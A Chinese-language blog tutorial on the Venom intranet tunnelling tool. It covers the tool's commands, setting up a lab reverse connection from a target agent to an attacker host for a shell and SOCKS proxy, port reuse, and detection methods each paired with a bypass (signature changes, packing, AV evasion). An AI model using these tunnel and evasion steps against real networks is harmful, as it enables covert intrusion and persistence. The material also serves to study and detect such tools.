内网渗透系列:内网隧道之Venom
目录
- 前言
- 一、概述
- 1、简介
- 2、原理
- 3、用法
- (1)服务端
- (2)客户端
- (3)加密
- (4)三层代理
- 二、实践
- 1、测试场景
- 2、建立隧道
- (1)服务端
- (2)客户端
- 3、抓包看看
- 三、探索
- 1、源码与分析
- 2、检测与绕过
- (1)特征字符串和特征码
- (2)端口控制
- (3)进程和库调用
- (4)SOCKS代理的检测
- 结语
前言
本文研究端口转发&SOCKS5&SSH的一个工具,Venom
github:https://github.com/Dliv3/Venom/
一、概述
1、简介
玄武实验室的Dliv3作品,最后更新于2019年,用Go编写,多级代理工具,功能极强,但是现在基本被各大杀软查杀了(需做好免杀)
- 多级socks5代理
- 多级端口转发
- 端口复用 (apache/mysql/…)
- ssh隧道
- 交互式shell
- 文件的上传和下载
- 节点间通信加密
- 支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)
2、原理
TCP连接,可直接获取shell,也可端口转发或SOCKS代理
3、用法
(1)服务端
监听
./admin_macos_x64 -lport 9999
内置命令
- help 打印帮助信息
- show 显示网络拓扑
- goto 操作某节点
- getdes/setdes 获取/设置节点信息描述
- connect/listen/sshconnect 节点间互连
- shell 获取节点的交互式shell
- upload/download 向节点上传/从节点下载文件
- socks 建立到某节点的socks5代理
- lforward/rforward 将本地端口转发到远程/将远程端口转发到本地
(2)客户端
发起
./agent_linux_x64 -rhost <server-ip> -rport 9999
端口复用
通过SO_REUSEPORT和SO_REUSEADDR选项进行端口复用
# 以windows下apache为例 # 复用apache 80端口,不影响apache提供正常的http服务 # -lhost 的值为本机ip,不能写0.0.0.0,否则无法进行端口复用 ./agent.exe -lhost 192.168.204.139 -reuse-port 80 ./admin_macos_x64 -rhost 192.168.204.139 -rport 80
通过iptables进行端口复用(仅支持Linux平台)
# 以linux下apache为例 # 需要root权限 sudo ./agent_linux_x64 -lport 8080 -reuse-port 80
(3)加密
# 通过-passwd指定密码为dlive@dubhe
./admin_macos_x64 -lport 8889 -passwd dlive@dubhe# agent指定相同的密码与admin节点连接
./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe
(4)三层代理
可参考
- 内网代理神器Venom及三层代理演示
- 内网穿透工具—Venom使用教程
二、实践
1、测试场景
攻击机(服务端):kali 192.168.10.128
目标机(客户端):ubuntu 192.168.10.129
都没有限制TCP连接
2、建立隧道
(1)服务端
./admin_linux_x64 -lport 2222
(2)客户端
./agent_linux_x64 -rhost 192.168.10.128 -rport 2222
3、抓包看看
TCP连接
获取shell
ls命令,这里是明文,因为用的时候没有进行加密
socks
三、探索
1、源码与分析
源码架构非常清晰,注释详细,可直接看
2、检测与绕过
(1)特征字符串和特征码
命令和log里的特征字符串可以作为检测特征
然后是代码里的特征码
绕过方法:修改掉相应的特征
(2)端口控制
做好端口控制
绕过方法:端口复用
(3)进程和库调用
通过终端的进程链控制和第三方库的调用情况在做检测
绕过方法:白进程利用,尽可能不调用库,加壳,主要是木马免杀那套
(4)SOCKS代理的检测
这是IDS这块,具体原理不清
结语
venom也是赫赫有名了,所以查杀理所当然都安排上了
内网渗透系列:内网隧道之Venom相关推荐
- 内网渗透系列:内网隧道之ICMP隧道
目录 前言 一.ICMP隧道技术 1.ICMP协议 (1)报文格式 (2)ping 2.ICMP隧道 (1)原理 (2)优缺点 二.ICMP隧道工具 1.icmpsh (1)源码 (2)用法 2.ic ...
- 内网渗透系列:内网隧道之pingtunnel
目录 前言 一.概述 1.简介 2.原理 3.使用 (1)直连出网 (2)跳板出网 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)nc 3.抓包看看 三.探索 1.源码与分析 ( ...
- 内网渗透系列:内网隧道之icmpsh
目录 前言 一.概述 1.简介 2.原理 3.使用 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)隧道建立成功 3.抓包看看 三.探索 1.源码与分析 (1)客户端 (2)服务端 ...
- 内网渗透系列:内网信息搜集方法小结2
目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...
- 内网渗透系列之mimikatz的使用以及后门植入
内网渗透系列之mimikatz的使用以及后门植入 文章目录 内网渗透系列之mimikatz的使用以及后门植入 前言 mimikatz的使用 后门植入 msf永久后门植入 (1)Meterpreter后 ...
- 内网渗透系列:信息搜集方法小结2
目录 前言 一.开源情报(OSINT) 1.whois/反查/相关资产 2.github敏感信息 (1)github邮箱密码爬取 (2)GSIL (3)x-patrol 3.google hackin ...
- 内网渗透-Linux内网渗透
系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...
- 内网渗透(十三)之内网信息收集-收集域环境中的基本信息
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透-Windows内网渗透
内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...
- ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术
hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...
最新文章
- docker 自定义网桥
- tostring、(string)和 String.valueOf()
- 哈密尔顿算法matlab,复杂制造过程最优哈密尔顿圈算法的MATLAB仿真与分析.doc
- 视觉SLAM十四讲(1):预备知识
- NeurIPS2021 MBT:多模态数据怎么融合?谷歌提出基于注意力瓶颈的方法,简单高效还省计算量...
- js拦截物联返回键跳转到指定页面
- 【Kafka】kafka Failed to acquire lock on file .lock in /data/kafak-logs a kafka instance
- 法国电信:5G加速数字化落地 物联网是首座金矿
- 文件下的所有文本内容转为一个csv文件代码
- VMware虚拟网络设置(NAT模式,桥接模式,仅主机模式设置),再也不用担心虚拟机连不上网了。
- Javascript中的条件语句和循环语句
- 精确到门牌号的地图_IP地址精准查询工具:能精确到门牌号
- 精益思想如何加速企业的全局价值流动?
- 关于利用背景减除法的固定摄像头的移动侦测算法
- 解析十大网络防骗术 全面防范网络欺诈
- redis连接与关闭
- 【数据异常校验】拉依达准则( PauTa Criterion 或 3σ准则) 处理异常数据
- C++快慢指针理解与应用
- 小试牛刀 python股票查询程序
- Java基础05-面向对象private\this\static关键字
热门文章
- 影响力最大化算法——degreediscount以及python实现代码
- python opencv实现 12色相环、24色相环(基于RGB空间和基于HSV空间实现)
- java混淆工具zelix比较_Java混淆器和java混淆编译
- 豆客服务器不稳定,豆客平台登陆器
- 《数据库应用》课程设计人事管理系统(java源代码)
- xp系统怎么telnet服务器,xp操作系统如何开启telnet服务?
- sap 服务器文件 暴露pdf地址,访问地址预览
- Cardhop for Mac(通讯录管理软件)
- UI自动化报错Can not connect to the Service解决方案
- 精简、root康佳电视升级包LED37R5200PDF(晨星Mstar),工具mstar-bin-tool等